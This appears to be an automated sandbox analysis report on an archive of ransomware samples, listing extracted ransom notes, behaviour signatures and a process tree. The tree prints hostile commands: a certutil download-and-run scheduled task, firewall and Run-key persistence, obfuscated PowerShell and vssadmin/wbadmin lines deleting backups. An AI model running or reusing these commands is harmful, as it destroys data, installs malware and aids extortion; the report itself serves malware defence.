Analysis

  • max time kernel
    379s
  • max time network
    383s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-10-2024 21:38

General

  • Target

    RNSM00403.7z

  • Size

    60.6MB

  • MD5

    f61f92161d115bc21c47483258803ca7

  • SHA1

    56c8ce8f2a6104b40f1a88d1b42f083dad7a9de9

  • SHA256

    8aeb260c2e350147f992e73b8f6fedba94fd04d12e8a2ba3e4ec8500baa13830

  • SHA512

    25e5061c1ed6c457c7f46bad5f19b27369dc4409f40c02bc2f63e39d102aa54a1ed7532018ef8a8c3469e574daf1c6ba8160c24ea5efbeaa8f5b97dfc63fe173

  • SSDEEP

    1572864:xLROHSmpHJN4vOB7FHXhWZHEvM33yiUY92Y3FCC7m9tx3Yrr:NROySTWw+yvwita2E7+tx3YP

Malware Config

Extracted

Family

mespinoza

Attributes
  • ransomnote

    Hi Company, Every byte on any types of your devices was encrypted. Don't try to use backups because it were encrypted too. To get all your data back contact us: [email protected] [email protected] -------------- FAQ: 1. Q: How can I make sure you don't fooling me? A: You can send us 2 files(max 2mb). 2. Q: What to do to get all data back? A: Don't restart the computer, don't move files and write us. 3. Q: What to tell my boss? A: Protect Your System Amigo.

Extracted

Path

F:\$RECYCLE.BIN\S-1-5-21-3227495264-2217614367-4027411560-1000\Readme.README

Ransom Note
Hi Company, Every byte on any types of your devices was encrypted. Don't try to use backups because it were encrypted too. To get all your data back contact us: [email protected] [email protected] -------------- FAQ: 1. Q: How can I make sure you don't fooling me? A: You can send us 2 files(max 2mb). 2. Q: What to do to get all data back? A: Don't restart the computer, don't move files and write us. 3. Q: What to tell my boss? A: Protect Your System Amigo.

Extracted

Path

C:\Program Files (x86)\readme.txt

Family

conti

Ransom Note
All of your files are currently encrypted by CONTI strain. As you know (if you don't - just "google it"), all of the data that has been encrypted by our software cannot be recovered by any means without contacting our team directly. If you try to use any additional recovery software - the files might be damaged, so if you are willing to try - try it on the data of the lowest value. To make sure that we REALLY CAN get your data back - we offer you to decrypt 2 random files completely free of charge. You can contact our team directly for further instructions through our website : TOR VERSION : (you should download and install TOR browser first https://torproject.org) http://m232fdxbfmbrcehbrj5iayknxnggf6niqfj6x4iedrgtab4qupzjlaid.onion HTTPS VERSION : https://contirecovery.info YOU SHOULD BE AWARE! Just in case, if you try to ignore us. We've downloaded a pack of your internal data and are ready to publish it on out news website if you do not respond. So it will be better for both sides if you contact us as soon as possible. ---BEGIN ID--- mEL9Y7SC22f1JfKAJi5NlYC2aVZ82ImX9nR568r2hXw9tn1weDwEc8s2r2thduYr ---END ID---
URLs

http://m232fdxbfmbrcehbrj5iayknxnggf6niqfj6x4iedrgtab4qupzjlaid.onion

https://contirecovery.info

Extracted

Path

C:\Recovery\README.d96d1f6d.TXT

Family

darkside

Ransom Note
----------- [ Welcome to Dark ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. Data leak ---------------------------------------------- First of all we have uploaded more then 100 GB data. Example of data: - Accounting data - Executive data - Sales data - Customer Support data - Marketing data - Quality data - And more other... Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC The data is preloaded and will be automatically published if you do not pay. After publication, your data will be available for at least 6 months on our tor cdn servers. We are ready: - To provide you the evidence of stolen data - To give you universal decrypting tool for all encrypted files. - To delete all the stolen data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68 When you open our website, put the following data in the input form: Key: pr9gzRnMz6qEwr6ovMT0cbjd9yT56NctfQZGIiVVLgo0ME2EQpAUyZucG9BLrOJjno5XLPvCN11TFfnlFHa42u5mJxoeR5k5RUgQAC1MC6LBUj4YOOAUyiBrR HQSUM3pzGoEPRVOzXSZ8YqkJyFL0TDFBbWaBKQDOSo9GzKKoVRQ0Eb02F5geTPkTAqZZSfSQ6PBBlTGPSgGe2kCyuwwp7lDmRSJlNnHssMMZHVhXzyZ6fxiBY gNiuusFK8JNI5nrtRPp3bMAc6OEddxfJWj6o2GT1Xg9j87Jp4Oyv43E1J61jLJAWBkmoBB3Gqv07mtyDW5PnmxBlNzABbLFEvJMQL23sR8nnw4svzcZHxrqD1 xRcxqyeKtsaQ5yqLvyQgMdnrI2QoCqkHYYUfBIzjO8BXyBZdmjHanXE57jdDAhjaDUUqfL917cCyJr1uwVR0Xj5lJXe8BIKHd3dFrz70CsIXFAhicOsBlFzIn daNcAXXyL8Fg1avIXOcuEkGRDXt8Cs8b3TAB6n4DrbLJdiFjECo8yCA9pxvzqjXatumUloblWFZaUoLVYzP !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!
URLs

http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC

http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68

Extracted

Path

C:\Program Files\Crashpad\attachments\Restore-My-Files.txt

Family

lockbit

Ransom Note
All your important files are encrypted! Any attempts to restore your files with the thrid-party software will be fatal for your files! RESTORE YOU DATA POSIBLE ONLY BUYING private key from us. There is only one way to get your files back: 1) Through a standard browser(FireFox, Chrome, Edge, Opera) | 1. Open link http://lockbit-decryptor.top/?8841DD9B0AC925FF9D181C92893BBBCE | 2. Follow the instructions on this page 2) Through a Tor Browser - recommended | 1. Download Tor browser - https://www.torproject.org/ and install it. | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?8841DD9B0AC925FF9D181C92893BBBCE This link only works in Tor Browser! | 3. Follow the instructions on this page ### Attention! ### # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site # Do not rename encrypted files. # Do not try to decrypt using third party software, it may cause permanent data loss. # Decryption of your files with the help of third parties may cause increased price(they add their fee to our). # Tor Browser may be blocked in your country or corporate network. Use https://bridges.torproject.org or use Tor Browser over VPN. # Tor Browser user manual https://tb-manual.torproject.org/about
URLs

http://lockbit-decryptor.top/?8841DD9B0AC925FF9D181C92893BBBCE

http://lockbitks2tvnmwk.onion/?8841DD9B0AC925FF9D181C92893BBBCE

Signatures

  • Conti Ransomware

    Ransomware generally thought to be a successor to Ryuk.

  • Conti family
  • DarkSide

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

  • Darkside family
  • DemonWare

    Ransomware first seen in mid-2020.

  • Demonware family
  • GandCrab payload 2 IoCs
  • Gandcrab

    Gandcrab is a Trojan horse that encrypts files on a computer.

  • Gandcrab family
  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba family
  • Lockbit

    Ransomware family with multiple variants released since late 2019.

  • Lockbit family
  • Mespinoza Ransomware 2 TTPs

    Also known as Pysa. Ransomware-as-a-servoce which first appeared in 2020.

  • Mespinoza family
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • Modifies boot configuration data using bcdedit 1 TTPs 3 IoCs
  • Renames multiple (1592) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Renames multiple (4445) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Renames multiple (5639) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Renames multiple (9854) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 31 IoCs
  • Identifies Wine through registry keys 2 TTPs 2 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 54 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Drops desktop.ini file(s) 31 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 64 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • UPX packed file 20 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 64 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 5 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 31 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 10 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Internet Explorer start page 1 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 2 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Opens file in notepad (likely ransom note) 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 23 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 2 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00403.7z"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:2784
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1312
    • C:\Windows\system32\taskmgr.exe
      "C:\Windows\system32\taskmgr.exe" /1
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:4572
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2592
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4956
      • C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.MSIL.Blocker.gen-86321c281edaeefe2a34647a20cdba5fd5479fcfb81e57fdce5158e6836a33a8.exe
        HEUR-Trojan-Ransom.MSIL.Blocker.gen-86321c281edaeefe2a34647a20cdba5fd5479fcfb81e57fdce5158e6836a33a8.exe
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of AdjustPrivilegeToken
        PID:648
        • C:\Users\Admin\AppData\Roaming\backup.exe
          "C:\Users\Admin\AppData\Roaming\backup.exe"
          4⤵
          • Executes dropped EXE
          PID:5444
      • C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.MSIL.Encoder.gen-6b2e96651e30d4c22ea6a684a859bbdd04872b6a8c7b28c42d3664a8c5e290ab.exe
        HEUR-Trojan-Ransom.MSIL.Encoder.gen-6b2e96651e30d4c22ea6a684a859bbdd04872b6a8c7b28c42d3664a8c5e290ab.exe
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4728
        • C:\Windows\SysWOW64\wscript.exe
          "C:\Windows\System32\wscript.exe" "C:\Updates\h.vbs" "C:\Updates\ZTH.bat"
          4⤵
          • Checks computer location settings
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:5024
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Updates\ZTH.bat" "
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:844
            • C:\Windows\SysWOW64\reg.exe
              reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v UpdateHandler /d "wscript "C:\Updates\h.vbs" "C:\Updates\Exec.bat""
              6⤵
              • Adds Run key to start application
              • System Location Discovery: System Language Discovery
              • Modifies registry key
              PID:2636
      • C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Blocker.gen-6e16a8eb2393714ab17c800d07663242aacb62a88e1044555271083b4a5c75b5.exe
        HEUR-Trojan-Ransom.Win32.Blocker.gen-6e16a8eb2393714ab17c800d07663242aacb62a88e1044555271083b4a5c75b5.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:1824
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1824 -s 1612
          4⤵
          • Program crash
          PID:7040
      • C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Convagent.gen-02a84352764e37be9723c06c4b838a8fe3f329a49fb621a098401df0b1842795.exe
        HEUR-Trojan-Ransom.Win32.Convagent.gen-02a84352764e37be9723c06c4b838a8fe3f329a49fb621a098401df0b1842795.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:2116
        • C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Convagent.gen-02a84352764e37be9723c06c4b838a8fe3f329a49fb621a098401df0b1842795.exe
          "C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Convagent.gen-02a84352764e37be9723c06c4b838a8fe3f329a49fb621a098401df0b1842795.exe"
          4⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Checks for VirtualBox DLLs, possible anti-VM trick
          • System Location Discovery: System Language Discovery
          PID:2984
          • C:\Windows\system32\cmd.exe
            C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\86ddda386cc8\86ddda386cc8.exe" enable=yes"
            5⤵
              PID:7388
              • C:\Windows\system32\netsh.exe
                netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\86ddda386cc8\86ddda386cc8.exe" enable=yes
                6⤵
                • Modifies Windows Firewall
                • Event Triggered Execution: Netsh Helper DLL
                PID:8584
            • C:\Windows\system32\cmd.exe
              C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
              5⤵
                PID:2444
                • C:\Windows\system32\netsh.exe
                  netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                  6⤵
                  • Modifies Windows Firewall
                  • Event Triggered Execution: Netsh Helper DLL
                  PID:2408
              • C:\Windows\rss\csrss.exe
                C:\Windows\rss\csrss.exe ""
                5⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Modifies data under HKEY_USERS
                PID:8636
                • C:\Windows\SYSTEM32\schtasks.exe
                  schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                  6⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:8932
                • C:\Windows\SYSTEM32\schtasks.exe
                  schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
                  6⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:6320
                • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
                  "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:7868
                • C:\Windows\system32\bcdedit.exe
                  C:\Windows\Sysnative\bcdedit.exe /v
                  6⤵
                  • Modifies boot configuration data using bcdedit
                  PID:7752
          • C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe
            HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe
            3⤵
            • Drops startup file
            • Executes dropped EXE
            • Drops desktop.ini file(s)
            • Drops file in Program Files directory
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2080
            • C:\Windows\SYSTEM32\cmd.exe
              cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{59C6D001-2A1D-495D-B41C-13CF70E22926}'" delete
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3440
              • C:\Windows\System32\wbem\WMIC.exe
                C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{59C6D001-2A1D-495D-B41C-13CF70E22926}'" delete
                5⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:4008
          • C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Encoder.gen-20371b37bbc403adb84e5f0896c843ea0c97cbed74362251a776f0f89b37e043.exe
            HEUR-Trojan-Ransom.Win32.Encoder.gen-20371b37bbc403adb84e5f0896c843ea0c97cbed74362251a776f0f89b37e043.exe
            3⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:3128
          • C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Foreign.vho-c3aa5acfc410447b8295039ab0721db78b4cc2a0f9773e63c3afbf2d98e57f2f.exe
            HEUR-Trojan-Ransom.Win32.Foreign.vho-c3aa5acfc410447b8295039ab0721db78b4cc2a0f9773e63c3afbf2d98e57f2f.exe
            3⤵
            • Executes dropped EXE
            • Adds Run key to start application
            PID:1056
          • C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.GandCrypt.gen-e7f27619b2dbf3427639a1d821b12022544c4279c57079d8c06df8d276e47b0c.exe
            HEUR-Trojan-Ransom.Win32.GandCrypt.gen-e7f27619b2dbf3427639a1d821b12022544c4279c57079d8c06df8d276e47b0c.exe
            3⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:3448
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 488
              4⤵
              • Program crash
              PID:2448
          • C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe
            HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe
            3⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Drops file in Program Files directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: RenamesItself
            • System policy modification
            PID:2792
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\update.bat" "
              4⤵
              • System Location Discovery: System Language Discovery
              PID:5076
          • C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe
            HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe
            3⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Adds Run key to start application
            • Drops desktop.ini file(s)
            • Enumerates connected drives
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Drops file in Program Files directory
            • System Location Discovery: System Language Discovery
            PID:3088
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
              4⤵
                PID:6696
                • C:\Windows\system32\vssadmin.exe
                  vssadmin delete shadows /all /quiet
                  5⤵
                  • Interacts with shadow copies
                  PID:6872
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic shadowcopy delete
                  5⤵
                    PID:2184
                  • C:\Windows\system32\bcdedit.exe
                    bcdedit /set {default} bootstatuspolicy ignoreallfailures
                    5⤵
                    • Modifies boot configuration data using bcdedit
                    PID:5540
                  • C:\Windows\system32\bcdedit.exe
                    bcdedit /set {default} recoveryenabled no
                    5⤵
                    • Modifies boot configuration data using bcdedit
                    PID:3656
                  • C:\Windows\system32\wbadmin.exe
                    wbadmin delete catalog -quiet
                    5⤵
                    • Deletes backup catalog
                    PID:7444
              • C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Blocker.msqy-ff81d22425d201f6f4580749050ca4984bbfeccc7be8a0283691ad7649517c7f.exe
                Trojan-Ransom.Win32.Blocker.msqy-ff81d22425d201f6f4580749050ca4984bbfeccc7be8a0283691ad7649517c7f.exe
                3⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Writes to the Master Boot Record (MBR)
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Modifies Internet Explorer start page
                • Suspicious use of SetWindowsHookEx
                PID:1264
              • C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Crusis.eib-815c65023598d2116c9c3f397888905cf233f34f70b430baf9ca5ca142e36cad.exe
                Trojan-Ransom.Win32.Crusis.eib-815c65023598d2116c9c3f397888905cf233f34f70b430baf9ca5ca142e36cad.exe
                3⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                PID:4996
              • C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exe
                Trojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exe
                3⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4736
                • C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exe
                  Trojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exe
                  4⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3404
              • C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Darkside.g-f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe
                Trojan-Ransom.Win32.Darkside.g-f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe
                3⤵
                • Executes dropped EXE
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:4728
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
                  4⤵
                  • Command and Scripting Interpreter: PowerShell
                  PID:5296
              • C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Encoder.dkc-2940604e31753c75f80a85b2ead90cd63bdcf2fe05094ceeec99ac35c7d898a3.exe
                Trojan-Ransom.Win32.Encoder.dkc-2940604e31753c75f80a85b2ead90cd63bdcf2fe05094ceeec99ac35c7d898a3.exe
                3⤵
                • Executes dropped EXE
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                PID:5520
              • C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Encoder.ktf-559440f61d38495c433fea442a58b4831422d52a04da1ef7f8e43b17a736a8fd.exe
                Trojan-Ransom.Win32.Encoder.ktf-559440f61d38495c433fea442a58b4831422d52a04da1ef7f8e43b17a736a8fd.exe
                3⤵
                • Checks computer location settings
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:5044
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\server.bat" "
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:5896
                  • C:\Users\Admin\AppData\Local\Temp\CyberPunk2077.sfx.exe
                    CyberPunk2077.sfx.exe -p1234 -dC:\Users\Admin\AppData\Local\Temp
                    5⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:5472
                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\CyberPunk2077.exe
                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\CyberPunk2077.exe"
                      6⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      PID:1324
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\CyberPunk2077.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\CyberPunk2077.exe"
                        7⤵
                        • Drops file in Drivers directory
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Drops file in System32 directory
                        • Drops file in Program Files directory
                        • Drops file in Windows directory
                        • System Location Discovery: System Language Discovery
                        PID:5800
              • C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Foreign.nmxn-a7c1706b88b29404d24806876ad8b4473d2f515ea517605d8568c6f1c686b594.exe
                Trojan-Ransom.Win32.Foreign.nmxn-a7c1706b88b29404d24806876ad8b4473d2f515ea517605d8568c6f1c686b594.exe
                3⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:5908
                • C:\Windows\SysWOW64\svchost.exe
                  "C:\Windows\SysWOW64\svchost.exe"
                  4⤵
                  • Adds Run key to start application
                  • Drops file in System32 directory
                  • System Location Discovery: System Language Discovery
                  • Modifies data under HKEY_USERS
                  PID:4292
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 4292 -s 720
                    5⤵
                    • Program crash
                    PID:5744
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 4292 -s 728
